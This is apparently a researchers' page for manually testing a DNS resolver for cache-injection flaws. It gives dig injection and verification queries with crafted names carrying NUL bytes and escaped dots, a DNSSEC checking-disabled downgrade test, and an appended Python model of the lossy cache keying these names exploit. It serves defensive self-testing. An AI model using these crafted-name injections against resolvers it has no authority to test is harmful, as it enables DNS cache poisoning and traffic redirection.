Manually testing for the vulnerability

This page contains instructions on how to test manually for the vulnerability. We provide instructions for triggering the required queries with the dig tool. If you do not have a copy of dig on your system, it can be downloaded at https://www.isc.org/download/ as part of the BIND9 download package.

If you are using Windows, do not use the included nslookup tool, as it is not able to trigger all required queries.

In each command, you have to replace @your-resolver-ip with the IP address of your resolver, such as @192.168.0.1.

Test explanation

Each test is split into two queries.

The first query is the injection query which aims to inject a test record into the target resolver's cache.

  • If the result of an injection query differs from the expected result shown below, your resolver behaves unexpectedly, but this does not necessarily mean it is vulnerable to the attack.

The second query is the verification query, which aims to identify whether the record could be injected.

In our case, we use two IP addresses, one representing a vulnerable and one representing a non-vulnerable result.

  • If you see the address 141.12.174.89 in response to a verification query, this means your resolver is not vulnerable to this attack.
  • If you see the address 141.12.174.88 in response to a verification query, this means your resolver is vulnerable to this attack.

Zero byte injection (direct, variant 1)

Injection query

$ dig '1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net. 300 IN A 141.12.174.88

Verification query

$ dig '1.victim.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
1.victim.test2.xdi-attack.net. 300 IN A         141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
1.victim.test2.xdi-attack.net. 300 IN A         141.12.174.88 <- vulnerable

Zero byte injection (direct, variant 2)

Injection query

$ dig '3.victim.test2.xdi-attack.net\000.test2.xdi-attack.net.' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
3.victim.test2.xdi-attack.net\000.test2.xdi-attack.net. 300 IN A 141.12.174.88

Verification query

$ dig '3.victim.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
3.victim.test2.xdi-attack.net. 300 IN A         141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
3.victim.test2.xdi-attack.net. 300 IN A         141.12.174.88 <- vulnerable

Zero byte injection (cname)

Injection query

$ dig '2.cnamezero.test2.xdi-attack.net' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
2.cnamezero.test2.xdi-attack.net. 300 IN CNAME  2.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.
2.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net. 300 IN A 141.12.174.88

Verification query

$ dig '2.victim.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
2.victim.test2.xdi-attack.net. 300 IN   A       141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
2.victim.test2.xdi-attack.net. 300 IN   A       141.12.174.88 <- vulnerable

Dot injection (direct)

Injection query

$ dig '1.victim\.dot.test2.xdi-attack.net' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
1.victim\.dot.test2.xdi-attack.net. 300 IN A    141.12.174.88

Verification query

$ dig '1.victim.dot.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
1.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
1.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.88 <- vulnerable

Dot injection (cname)

Injection query

$ dig '2.cnamedot.test2.xdi-attack.net' @your-resolver-ip

Expected result:

;; ANSWER SECTION:
2.cnamedot.test2.xdi-attack.net. 300 IN CNAME   2.victim\.dot.test2.xdi-attack.net.
2.victim\.dot.test2.xdi-attack.net. 300 IN A    141.12.174.88

Verification query

$ dig '2.victim.dot.test2.xdi-attack.net' @your-resolver-ip

Result if not vulnerable:

;; ANSWER SECTION:
2.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.89 <- non-vulnerable

Result if vulnerable:

;; ANSWER SECTION:
2.victim.dot.test2.xdi-attack.net. 300 IN A     141.12.174.88 <- vulnerable
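As an added illustration, not part of the original test page or of the xdi-attack.net test setup, the constructed Python model below shows why the zero-byte and dot injection tests above can poison a cache: a resolver that decodes an answer's owner name to text and keys its cache on that string collapses '1.victim.test2.xdi-attack.net.\000.test2.xdi-attack.net.' onto '1.victim.test2.xdi-attack.net', while keying on the length-prefixed wire form keeps the two names distinct. The lossy naive_key is a toy of one possible failure mode (text key stored as a C string), not the code of any named resolver; it reproduces variant 1 and the direct dot injection.

```python
def parse_name(text: str) -> list[bytes]:
    """Parse a dig-style presentation name into wire labels, honouring the
    RFC 1035 escapes \\DDD (one byte, decimal) and \\. (a literal dot that
    stays inside its label). A trailing root dot is consumed."""
    labels, cur, i = [], bytearray(), 0
    while i < len(text):
        ch = text[i]
        if ch == "\\":
            ddd = text[i + 1:i + 4]
            if len(ddd) == 3 and ddd.isdigit():
                cur.append(int(ddd)); i += 4          # \000 -> 0x00 byte
            else:
                cur.append(ord(text[i + 1])); i += 2  # \. -> '.' inside label
        elif ch == ".":
            if not cur: raise ValueError("empty label in %r" % text)
            labels.append(bytes(cur)); cur = bytearray(); i += 1
        else:
            cur.append(ord(ch)); i += 1
    if cur:
        labels.append(bytes(cur))
    return labels

def to_wire(labels: list[bytes]) -> bytes:
    """Length-prefixed wire form (RFC 1035 3.1): a NUL or '.' inside a label
    cannot be mistaken for a label boundary. Case folding omitted for brevity."""
    return b"".join(bytes([len(lab)]) + lab for lab in labels) + b"\x00"

def naive_key(labels: list[bytes]) -> str:
    """Constructed lossy key: decode labels to text, join with '.', append the
    root dot, and store as a C string, which ends at the first NUL byte."""
    fqdn = b".".join(labels) + b"."
    return fqdn.split(b"\x00", 1)[0].decode("latin-1")

def cache_lookup(key_fn, injected_name: str, queried_name: str, rdata: str):
    """Toy cache: store one A record under injected_name using key_fn, then
    look up queried_name. Returns rdata on a hit, None on a miss."""
    cache = {key_fn(parse_name(injected_name)): rdata}
    return cache.get(key_fn(parse_name(queried_name)))

if __name__ == "__main__":
    # Injection/verification name pairs taken from the tests on this page.
    tests = [("1.victim.test2.xdi-attack.net.\\000.test2.xdi-attack.net.",
              "1.victim.test2.xdi-attack.net"),
             ("1.victim\\.dot.test2.xdi-attack.net",
              "1.victim.dot.test2.xdi-attack.net")]
    for injected, queried in tests:
        for label, fn in (("naive text key", naive_key), ("wire key", to_wire)):
            hit = cache_lookup(fn, injected, queried, "141.12.174.88")
            print(f"{label:15s} {queried}: {hit or 'miss (not poisoned)'}")
```

A hit under naive_key corresponds to the "vulnerable" 141.12.174.88 result in the verification queries above; a miss means the resolver would have to resolve the verification name itself and would receive 141.12.174.89.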

Checking disabled (CD = 1) DNSSEC downgrade

Pre-check

First, check whether your resolver validates DNSSEC; if it does not, testing for this vulnerability is pointless.

 $ dig sigfail.verteiltesysteme.net @your-resolver-ip
 (should return SERVFAIL/nothing)

Injection query

 $ dig sigfail.verteiltesysteme.net +cdflag @your-resolver-ip
 (should always return 134.91.78.139)

Verification query

 $ dig sigfail.verteiltesysteme.net +short @your-resolver-ip
 (returns 134.91.78.139 if vulnerable, should return SERVFAIL/nothing)